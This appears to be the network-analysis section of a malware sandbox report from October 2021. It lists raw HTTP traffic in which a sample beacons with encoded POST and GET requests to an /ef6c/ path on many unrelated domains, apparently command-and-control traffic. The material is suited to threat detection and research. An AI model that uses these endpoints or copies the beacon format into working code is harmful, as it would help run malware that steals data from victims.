Network Analysis

POST /ef6c/ HTTP/1.1 Host: www.gicaredocs.com Connection: close Content-Length: 281 Cache-Control: no-cache Origin: http://www.gicaredocs.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.gicaredocs.com/ef6c/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /ef6c/?t8o=dQ8jXmGBocPwA167SrVCKSfe9kfjfwf5Y/UytJXCMDqauGkqvJ/2eQvfbvtaR0w7HyB9eXq/&UlX=YvIpZ HTTP/1.1 Host: www.gicaredocs.com Connection: close

HTTP/1.1 200 OK Date: Mon, 04 Oct 2021 01:16:12 GMT Server: Apache Set-Cookie: vsid=919vr3808557721213372; expires=Sat, 03-Oct-2026 01:16:12 GMT; Max-Age=157680000; path=/; domain=www.gicaredocs.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_fLcVXRYcdJ4oIGzXlBAh/su4kcsIJR9FhrThpDcC0wR6whbQ1pzxbOxevtXfAdn4mq73951XD5GUMXMAMzLh6w== Keep-Alive: timeout=5, max=114 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8

POST /ef6c/ HTTP/1.1 Host: www.szyyglass.com Connection: close Content-Length: 281 Cache-Control: no-cache Origin: http://www.szyyglass.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.szyyglass.com/ef6c/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /ef6c/?t8o=WJZ/PBlgU2sqxbhuKWSW0gAF450CRpcifwWN2Hn02+HJZd2OB2qk7jd6844pcDa/ZUIS0tAu&UlX=YvIpZ HTTP/1.1 Host: www.szyyglass.com Connection: close

HTTP/1.1 200 OK Server: nginx Date: Mon, 04 Oct 2021 01:16:33 GMT Content-Type: text/html Content-Length: 795 Connection: close

POST /ef6c/ HTTP/1.1 Host: www.gaminghallarna.net Connection: close Content-Length: 281 Cache-Control: no-cache Origin: http://www.gaminghallarna.net User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.gaminghallarna.net/ef6c/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /ef6c/?t8o=klh7vGPfywtzHDqBe0mXtw9R4RUvLJCc3Nh/2lv7lW0muO/R44RuNcsYgcRk+/HbCIQeLGan&UlX=YvIpZ HTTP/1.1 Host: www.gaminghallarna.net Connection: close

HTTP/1.1 200 OK Server: nginx Date: Mon, 04 Oct 2021 01:16:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.21

POST /ef6c/ HTTP/1.1 Host: www.levanttradegroup.com Connection: close Content-Length: 281 Cache-Control: no-cache Origin: http://www.levanttradegroup.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.levanttradegroup.com/ef6c/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 405 Not Allowed Server: openresty Date: Mon, 04 Oct 2021 01:16:35 GMT Content-Type: text/html Content-Length: 556 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_ZlSj+/gzpZAXTEtvKiA0hAH3uXWm7fUVuLGtSSdJbLuurHsJv5ZK2L5/Jj59vdxlRRuiDcnFfnKo0PCC0Big3A Via: 1.1 google Connection: close

GET /ef6c/?t8o=9g8sfBGzWY6JJ+yJLDpPQys/8ShNqhTPTp4cpY8RvCwAQwKx0UrfmPEzoi+Z1D/DgpYog5qv&UlX=YvIpZ HTTP/1.1 Host: www.levanttradegroup.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 04 Oct 2021 01:16:35 GMT Content-Type: text/html Content-Length: 275 ETag: "6157651a-113" Via: 1.1 google Connection: close

POST /ef6c/ HTTP/1.1 Host: www.fis.photos Connection: close Content-Length: 281 Cache-Control: no-cache Origin: http://www.fis.photos User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.fis.photos/ef6c/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 04 Oct 2021 01:16:45 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.fis.photos/ef6c/ X-ac: 3.nrt _bur

GET /ef6c/?t8o=iVGcxgJZg7dDdqnpGvHyDNlE3XmNDIFvU6VDaZ8nDL6WJmv+1asF/xEbeuA1UUYS6lydoag+&UlX=YvIpZ HTTP/1.1 Host: www.fis.photos Connection: close

HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 04 Oct 2021 01:16:45 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.fis.photos/ef6c/?t8o=iVGcxgJZg7dDdqnpGvHyDNlE3XmNDIFvU6VDaZ8nDL6WJmv+1asF/xEbeuA1UUYS6lydoag+&UlX=YvIpZ X-ac: 3.nrt _bur

POST /ef6c/ HTTP/1.1 Host: www.lafabriqueabeilleassurances.com Connection: close Content-Length: 281 Cache-Control: no-cache Origin: http://www.lafabriqueabeilleassurances.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.lafabriqueabeilleassurances.com/ef6c/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /ef6c/?t8o=2QYE7mkSl4x2jlZo54GRK50GO3C76nvR62kgjEMbDIxrMKFbsYZiIeVfmB5iSiZWlGlMGs/r&UlX=YvIpZ HTTP/1.1 Host: www.lafabriqueabeilleassurances.com Connection: close

HTTP/1.1 200 OK Server: nginx Date: Mon, 04 Oct 2021 01:16:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language

POST /ef6c/ HTTP/1.1 Host: www.redelirevearyseuiop.xyz Connection: close Content-Length: 281 Cache-Control: no-cache Origin: http://www.redelirevearyseuiop.xyz User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.redelirevearyseuiop.xyz/ef6c/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /ef6c/?t8o=+zggs108Zt88mF3I15I6Vl7MIKEVgTDkllssvVc7oGo+vC3UJFm7tcArJeeO3BpO4YdkYwbo&UlX=YvIpZ HTTP/1.1 Host: www.redelirevearyseuiop.xyz Connection: close